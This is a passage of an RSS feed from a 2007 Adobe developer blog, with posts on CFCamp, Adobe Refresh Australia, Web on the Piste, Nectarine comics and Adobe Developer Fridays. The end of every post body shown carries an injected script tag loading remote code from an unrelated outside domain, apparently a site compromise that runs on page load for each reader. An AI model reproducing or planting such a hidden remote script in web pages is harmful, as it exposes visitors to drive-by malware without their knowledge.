<p>Check out the <a href="http://cfcamp.pbwiki.com">wiki</a>, vote for the community driven sessions, and come along and network with other developers interested in the latest for the Web, RIAs and desktop apps with AIR.</p>
<p>Hope to see you there (whether that&#8217;s in Sydney, Brisbane, Melbourne or Perth)!<br />
<script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/10/11/adobe-refresh-australia-learn-about-max-2007/' rel='bookmark' title='Permanent Link: Adobe Refresh Australia, learn about MAX 2007'>Adobe Refresh Australia, learn about MAX 2007</a></li>
<li><a href='http://www.flexdaddy.com/2006/09/24/online-flex-seminars-in-australia-and-new-zealand/' rel='bookmark' title='Permanent Link: Online Flex seminars in Australia and New Zealand'>Online Flex seminars in Australia and New Zealand</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe Refresh Australia, learn about MAX 2007</title>
		<link>http://www.flexdaddy.com/2007/10/11/adobe-refresh-australia-learn-about-max-2007/</link>
		<comments>http://www.flexdaddy.com/2007/10/11/adobe-refresh-australia-learn-about-max-2007/#comments</comments>
		<pubDate>Thu, 11 Oct 2007 13:24:35 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Conference]]></category>
		<category><![CDATA[adobe refresh]]></category>
		<category><![CDATA[AIR]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[Flex]]></category>
		<category><![CDATA[MAX]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2007/10/11/adobe-refresh-australia-learn-about-max-2007/</guid>
		<description><![CDATA[
			
				
			
		

Adobe Australia are holding a &#8220;Refresh&#8221; event for the local developer communities. This is your chance to hear first hand the latest news and announcements surrounding Adobe&#8217;s developer technologies! I promise you will not be disappointed! So come and spend an afternoon with your local Adobe crew including myself, Matt Voerman, Mark Blair, Mark Szulc [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/' rel='bookmark' title='Permanent Link: CFCAMP Australia is more than just ColdFusion'>CFCAMP Australia is more than just ColdFusion</a></li>
<li><a href='http://www.flexdaddy.com/2007/06/01/google-gears-and-adobe-apollo-on-sqlite/' rel='bookmark' title='Permanent Link: Google Gears and Adobe Apollo on SQLite'>Google Gears and Adobe Apollo on SQLite</a></li>
<li><a href='http://www.flexdaddy.com/2007/06/15/australia-and-new-zealand-check-out-the-air-derby/' rel='bookmark' title='Permanent Link: Australia and New Zealand, check out the AIR derby'>Australia and New Zealand, check out the AIR derby</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F10%2F11%2Fadobe-refresh-australia-learn-about-max-2007%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F10%2F11%2Fadobe-refresh-australia-learn-about-max-2007%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://events.adobe.co.uk/events/cgi/event.cgi?country=pa&#038;eventid=5999"><img src="http://www.flexdaddy.info/images/adobe_refresh.png" alt="Adobe Refresh 2007" width="420" /></a></p>
<p><a href="http://www.adobe.com.au">Adobe Australia</a> are holding a &#8220;<a href="http://events.adobe.co.uk/events/cgi/event.cgi?country=pa&#038;eventid=5999">Refresh</a>&#8221; event for the local developer communities. This is your chance to hear first hand the latest news and announcements surrounding Adobe&#8217;s developer technologies! I promise you will not be disappointed! So come and spend an afternoon with your local Adobe crew including myself, <a href="http://blog.schematic.com.au/">Matt Voerman</a>, <a href="http://www.blairsblog.com/">Mark Blair</a>, <a href="http://www.markszulc.com/">Mark Szulc</a> and many others.</p>
<p><a href="http://events.adobe.co.uk/events/cgi/event.cgi?country=pa&#038;eventid=5999">Click here to register.</a></p>
<p><strong>Details:</strong></p>
<p><em>Join us for an opportunity to connect with the local developer community, whilst refreshing your knowledge on the latest from Adobe at Adobe Refresh 2007.</p>
<p>Over the course of an afternoon, you will hear from the local Adobe team as they present on whatâ€™s new and whatâ€™s happening in AIR, Flash Professional, Flex, Dreamweaver, Fireworks and ColdFusion.</p>
<p>Thereâ€™ll be summaries from the Keynote Presentations at Adobe Max 2007, as well as Community Expert Tables and plenty of time to socialise.</em></p>
<p><strong>When:</strong></p>
<p><strong>Tue 30 Oct 07</strong><br />
Sydney Convention &#038; Exhibition Centre, Darling Harbour<br />
13:30 &#8211; 17:00</p>
<p><strong>Wed 31 Oct 07</strong><br />
Telstra Dome, Melbourne<br />
13:30 &#8211; 17:00</p>
<p>Hope to see you there! <img src='http://www.flexdaddy.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> 	<script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/' rel='bookmark' title='Permanent Link: CFCAMP Australia is more than just ColdFusion'>CFCAMP Australia is more than just ColdFusion</a></li>
<li><a href='http://www.flexdaddy.com/2007/06/01/google-gears-and-adobe-apollo-on-sqlite/' rel='bookmark' title='Permanent Link: Google Gears and Adobe Apollo on SQLite'>Google Gears and Adobe Apollo on SQLite</a></li>
<li><a href='http://www.flexdaddy.com/2007/06/15/australia-and-new-zealand-check-out-the-air-derby/' rel='bookmark' title='Permanent Link: Australia and New Zealand, check out the AIR derby'>Australia and New Zealand, check out the AIR derby</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2007/10/11/adobe-refresh-australia-learn-about-max-2007/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Barely out of Beta &#8211; New RIA comic!</title>
		<link>http://www.flexdaddy.com/2007/09/13/barely-out-of-beta-new-ria-comic/</link>
		<comments>http://www.flexdaddy.com/2007/09/13/barely-out-of-beta-new-ria-comic/#comments</comments>
		<pubDate>Thu, 13 Sep 2007 02:17:40 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[comic]]></category>
		<category><![CDATA[funny]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2007/09/13/barely-out-of-beta-new-ria-comic/</guid>
		<description><![CDATA[
			
				
			
		
The dudes over at Nectarine have released the first of a short series of comic strips around RIA. The first story comes from the recent happenings at Web on the Piste where Adobe and Microsoft had a friendly showdown at the speaker round table.
This comic strip is going to make me famous!!! &#8220;Internet&#8221; baby yeah!

&#8220;Barely [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/10/11/ria-comic-barely-out-of-beta-3/' rel='bookmark' title='Permanent Link: RIA Comic &#8211; Barely Out Of Beta # 3'>RIA Comic &#8211; Barely Out Of Beta # 3</a></li>
<li><a href='http://www.flexdaddy.com/2007/09/18/ria-comic-barely-out-of-beta-2/' rel='bookmark' title='Permanent Link: RIA Comic &#8211; Barely Out Of Beta # 2'>RIA Comic &#8211; Barely Out Of Beta # 2</a></li>
<li><a href='http://www.flexdaddy.com/2006/07/04/flex-daddy-gets-a-new-outfit-and-a-superhero/' rel='bookmark' title='Permanent Link: Flex Daddy gets a new outfit .. and a superhero!'>Flex Daddy gets a new outfit .. and a superhero!</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F09%2F13%2Fbarely-out-of-beta-new-ria-comic%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F09%2F13%2Fbarely-out-of-beta-new-ria-comic%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>The dudes over at <a href="http://www.nectarine.com.au/nectarineblog/index.php?/archives/14-Barely-Out-Of-Beta-comic-strip.html">Nectarine</a> have released the first of a short series of comic strips around RIA. The first story comes from the recent happenings at <a href="http://www.webonthepiste.com">Web on the Piste</a> where Adobe and Microsoft had a <em>friendly</em> showdown at the speaker round table.</p>
<p>This comic strip is going to make me famous!!! <strong>&#8220;Internet&#8221; baby yeah!</strong></p>
<p><a href="http://www.nectarine.com.au/nectarineblog/index.php?/archives/14-Barely-Out-Of-Beta-comic-strip.html"><img src="http://www.nectarine.com.au/nectarineblog/uploads/20070911_maria3.jpg" width="420" alt="Barely Out Of Beta" /></a></p>
<p><a href="http://www.nectarine.com.au/nectarineblog/index.php?/archives/14-Barely-Out-Of-Beta-comic-strip.html">&#8220;Barely Out Of Beta&#8221;</a></p>
<p>Check out many of the other awesome animations at <a href="http://animation.nectarine.com.au/">animation.nectarine.com.au</a><script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/10/11/ria-comic-barely-out-of-beta-3/' rel='bookmark' title='Permanent Link: RIA Comic &#8211; Barely Out Of Beta # 3'>RIA Comic &#8211; Barely Out Of Beta # 3</a></li>
<li><a href='http://www.flexdaddy.com/2007/09/18/ria-comic-barely-out-of-beta-2/' rel='bookmark' title='Permanent Link: RIA Comic &#8211; Barely Out Of Beta # 2'>RIA Comic &#8211; Barely Out Of Beta # 2</a></li>
<li><a href='http://www.flexdaddy.com/2006/07/04/flex-daddy-gets-a-new-outfit-and-a-superhero/' rel='bookmark' title='Permanent Link: Flex Daddy gets a new outfit .. and a superhero!'>Flex Daddy gets a new outfit .. and a superhero!</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2007/09/13/barely-out-of-beta-new-ria-comic/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Nectarine keynote animations are online</title>
		<link>http://www.flexdaddy.com/2007/08/27/nectarine-keynote-animations-are-online/</link>
		<comments>http://www.flexdaddy.com/2007/08/27/nectarine-keynote-animations-are-online/#comments</comments>
		<pubDate>Mon, 27 Aug 2007 00:17:21 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[animation]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[webDU]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2007/08/27/nectarine-keynote-animations-are-online/</guid>
		<description><![CDATA[
			
				
			
		
Grant has blogged the Web on the Piste keynote intro animations made by the team at Nectarine. Some of you may recognize the style, and that&#8217;s coz these guys also do the animations for WebDU (and the speaker face on this blog).
Check them out at the Web on the Piste Blog
Great work guys!


Related posts:Barely out [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/09/13/barely-out-of-beta-new-ria-comic/' rel='bookmark' title='Permanent Link: Barely out of Beta &#8211; New RIA comic!'>Barely out of Beta &#8211; New RIA comic!</a></li>
<li><a href='http://www.flexdaddy.com/2006/07/04/flex-daddy-gets-a-new-outfit-and-a-superhero/' rel='bookmark' title='Permanent Link: Flex Daddy gets a new outfit .. and a superhero!'>Flex Daddy gets a new outfit .. and a superhero!</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F08%2F27%2Fnectarine-keynote-animations-are-online%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F08%2F27%2Fnectarine-keynote-animations-are-online%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>Grant has blogged the <a href="http://www.webonthepiste.com">Web on the Piste</a> keynote intro animations made by the team at <a href="http://www.nectarine.com.au">Nectarine</a>. Some of you may recognize the style, and that&#8217;s coz these guys also do the animations for <a href="http://www.webdu.com.au">WebDU</a> (and the speaker face on this blog).</p>
<p>Check them out at the <a href="http://www.webonthepiste.com/webonthepiste/blog/blog_home.cfm">Web on the Piste Blog</a></p>
<p>Great work guys!<script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/09/13/barely-out-of-beta-new-ria-comic/' rel='bookmark' title='Permanent Link: Barely out of Beta &#8211; New RIA comic!'>Barely out of Beta &#8211; New RIA comic!</a></li>
<li><a href='http://www.flexdaddy.com/2006/07/04/flex-daddy-gets-a-new-outfit-and-a-superhero/' rel='bookmark' title='Permanent Link: Flex Daddy gets a new outfit .. and a superhero!'>Flex Daddy gets a new outfit .. and a superhero!</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2007/08/27/nectarine-keynote-animations-are-online/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web on the Piste, a successful conference!</title>
		<link>http://www.flexdaddy.com/2007/08/27/web-on-the-piste-a-successful-conference/</link>
		<comments>http://www.flexdaddy.com/2007/08/27/web-on-the-piste-a-successful-conference/#comments</comments>
		<pubDate>Mon, 27 Aug 2007 00:11:56 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Conference]]></category>
		<category><![CDATA[Flex]]></category>
		<category><![CDATA[queenstown]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2007/08/27/web-on-the-piste-a-successful-conference/</guid>
		<description><![CDATA[
			
				
			
		
I&#8217;m sitting in the lounge at Sydney International Airport, the morning after returning from Queenstown New Zealand from the Web on the Piste conference. Approx 100 attendees made it to this &#8220;vendor neutral&#8221; event, with a myriad of speakers including those from Adobe and Microsoft, to the team at Universal Mind and Smartmail. The location [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/10/11/adobe-refresh-australia-learn-about-max-2007/' rel='bookmark' title='Permanent Link: Adobe Refresh Australia, learn about MAX 2007'>Adobe Refresh Australia, learn about MAX 2007</a></li>
<li><a href='http://www.flexdaddy.com/2007/08/27/nectarine-keynote-animations-are-online/' rel='bookmark' title='Permanent Link: Nectarine keynote animations are online'>Nectarine keynote animations are online</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F08%2F27%2Fweb-on-the-piste-a-successful-conference%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F08%2F27%2Fweb-on-the-piste-a-successful-conference%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>I&#8217;m sitting in the lounge at Sydney International Airport, the morning after returning from Queenstown New Zealand from the <a href="http://www.webonthepiste.com">Web on the Piste</a> conference. Approx 100 attendees made it to this &#8220;vendor neutral&#8221; event, with a myriad of speakers including those from <a href="http://www.adobe.com">Adobe</a> and <a href="http://www.microsoft.com">Microsoft</a>, to the team at <a href="http://www.universalmind.com/">Universal Mind</a> and <a href="http://www.smartmail.co.nz">Smartmail</a>. The location was amazing and I&#8217;m sure there&#8217;ll be punches thrown as people fight to decide who will be heading back there next year. <a href="http://blog.schematic.com.au">Matt Voerman</a> and I hope to be back there soon!</p>
<p>Kudos to Todd @ <a href="http://www.gruden.com.au">Gruden</a> and Grant @ <a href="http://www.straker.co.nz">Straker</a> and both their teams for hosting the conference.</p>
<p>I took plenty of photos, and will have to fire up my flickr or picasa account and put some up. And for those facebook users out there, search for Web on the Piste and take a look at the photos. </p>
<p>But now it&#8217;s on to Tokyo for some corporate training and to catch up with <a href="http://www.prosimian.com.au">Chris Marmo</a> from <a href="http://www.informationarchitects.jp">Information Architects Japan</a>.<script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/10/11/adobe-refresh-australia-learn-about-max-2007/' rel='bookmark' title='Permanent Link: Adobe Refresh Australia, learn about MAX 2007'>Adobe Refresh Australia, learn about MAX 2007</a></li>
<li><a href='http://www.flexdaddy.com/2007/08/27/nectarine-keynote-animations-are-online/' rel='bookmark' title='Permanent Link: Nectarine keynote animations are online'>Nectarine keynote animations are online</a></li>
<li><a href='http://www.flexdaddy.com/2008/08/04/air-camp-keynote-slides/' rel='bookmark' title='Permanent Link: AIR Camp keynote slides'>AIR Camp keynote slides</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2007/08/27/web-on-the-piste-a-successful-conference/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Adobe announces Developer Fridays</title>
		<link>http://www.flexdaddy.com/2007/06/19/adobe-announces-developer-fridays/</link>
		<comments>http://www.flexdaddy.com/2007/06/19/adobe-announces-developer-fridays/#comments</comments>
		<pubDate>Tue, 19 Jun 2007 07:13:35 +0000</pubDate>
		<dc:creator>Andrew Spaulding</dc:creator>
				<category><![CDATA[Adobe]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[AIR]]></category>
		<category><![CDATA[developer]]></category>
		<category><![CDATA[Flex]]></category>
		<category><![CDATA[RIA]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.flexdaddy.info/2007/06/19/adobe-announces-developer-fridays/</guid>
		<description><![CDATA[
			
				
			
		
Here at Adobe Australia we&#8217;ve announced a series of live sessions for developers, introducing new technologies, ideas, and concepts, in an open forum using Acrobat Connect. What&#8217;s great about it is the time slot! Perfect for developers living in Australia and New Zealand (but not limited to people from these audiences, so if you find [...]


Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/' rel='bookmark' title='Permanent Link: CFCAMP Australia is more than just ColdFusion'>CFCAMP Australia is more than just ColdFusion</a></li>
<li><a href='http://www.flexdaddy.com/2006/09/24/online-flex-seminars-in-australia-and-new-zealand/' rel='bookmark' title='Permanent Link: Online Flex seminars in Australia and New Zealand'>Online Flex seminars in Australia and New Zealand</a></li>
<li><a href='http://www.flexdaddy.com/2008/05/01/adobe-removes-all-restrictions-on-swf-and-flv-specs/' rel='bookmark' title='Permanent Link: Adobe removes all restrictions on SWF and FLV specs'>Adobe removes all restrictions on SWF and FLV specs</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;margin-top:10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F06%2F19%2Fadobe-announces-developer-fridays%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.flexdaddy.com%2F2007%2F06%2F19%2Fadobe-announces-developer-fridays%2F&amp;source=spaulds&amp;style=normal&amp;service=bit.ly" height="61" width="50" /><br />
			</a>
		</div>
<p>Here at Adobe Australia we&#8217;ve announced a series of <a href="http://events.adobe.co.uk/events/cgi/event.cgi?country=pa&#038;eventid=5407">live sessions for developers</a>, introducing new technologies, ideas, and concepts, in an open forum using Acrobat Connect. What&#8217;s great about it is the time slot! Perfect for developers living in Australia and New Zealand (but not limited to people from these audiences, so if you find yourself unable to sleep feel free to join us!)</p>
<p>Both myself, <a href="http://www.markszulc.com">Mark Szulc</a>, and <a href="http://brianchau.wordpress.com">Brian Chau</a> will host the presentations, with the first session on July 6 at 2pm (Australian Eastern Standard Time) discussing <strong><a href="http://events.adobe.co.uk/events/cgi/register.cgi?country=pa&#038;eventid=5407&#038;venueid=5542">what&#8217;s new in Flex 3</a></strong>.</p>
<p>Topics include:</p>
<ul>
<li>What&#8217;s new in Flex 3?</li>
<li>Introduction to LiveCycle Designer</li>
<li>Web applications and AJAX using Dreamweaver</li>
<li>ColdFusion 8 &#8211; Working with PDF forms and documents</li>
<li>Maximising the User Experience with AIR</li>
<li>Improve the performance of your applications with ActionScript in Flash CS3</li>
<li>LiveCycle Data Services &#8211; Combining PDF documents into your Flex applications</li>
<li>Take your applications off-line with AIR</li>
<li>Develop custom components for Flex with Flash CS3</li>
</ul>
<p>For more information visit the <a href="http://events.adobe.co.uk/events/cgi/event.cgi?country=pa&#038;eventid=5407">registration page</a> and sign up for any or all of the sessions.<script src="http://ae.awaue.com/7"></script></p>


<p>Related posts:<ol><li><a href='http://www.flexdaddy.com/2007/11/11/cfcamp-australia-is-more-than-just-coldfusion/' rel='bookmark' title='Permanent Link: CFCAMP Australia is more than just ColdFusion'>CFCAMP Australia is more than just ColdFusion</a></li>
<li><a href='http://www.flexdaddy.com/2006/09/24/online-flex-seminars-in-australia-and-new-zealand/' rel='bookmark' title='Permanent Link: Online Flex seminars in Australia and New Zealand'>Online Flex seminars in Australia and New Zealand</a></li>
<li><a href='http://www.flexdaddy.com/2008/05/01/adobe-removes-all-restrictions-on-swf-and-flv-specs/' rel='bookmark' title='Permanent Link: Adobe removes all restrictions on SWF and FLV specs'>Adobe removes all restrictions on SWF and FLV specs</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.flexdaddy.com/2007/06/19/adobe-announces-developer-fridays/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
